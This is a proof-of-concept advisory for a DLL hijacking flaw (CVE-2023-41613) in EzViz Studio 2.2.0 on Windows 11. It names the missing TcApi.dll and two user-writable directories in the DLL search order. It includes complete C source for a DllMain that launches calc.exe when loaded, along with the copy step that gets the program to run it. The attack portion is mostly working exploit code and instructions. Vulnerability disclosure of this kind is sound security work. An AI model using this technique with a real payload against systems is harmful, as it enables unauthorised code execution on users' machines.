PoC: *DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)* *Author: EAFZ aka myantti3m* *CVE: **CVE**-2023-41613.* *Test Environment:* OS: Windows 11 Pro 64 bit(10.0, Build 2261) EzViz Studio version: 2.2.0 *Technical Description * *1. **Technical Description * EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll doesn’t exist in any of the paths of the DLL search order. In particular, some paths have writable permissions for normal users as: · C:\Users\\AppData\Local\Programs\Microsoft VS Code\bin\TcApi.dll · C:\Users\\AppData\Local\Microsoft\WindowsApps\TcApi.dll So we can plant “malicious” TcApi.dll inside these directories and wait until the application will load it. *POC* We created a malicious DLL file (TcApi.dll) and complied it. In our case, it opens calc.exe. You can see the code below: #include #pragma comment (lib, "user32.lib") #include "pch.h" #include #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { switch (nReason) { case DLL_PROCESS_ATTACH: system("calc.exe"); break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; } Copy “malicious” TcApi.dll to C:\Users\\AppData\Local\Microsoft\WindowsApps\TcApi.dll If we run the EzVizStudio again, the code from the “malicious” DLL runs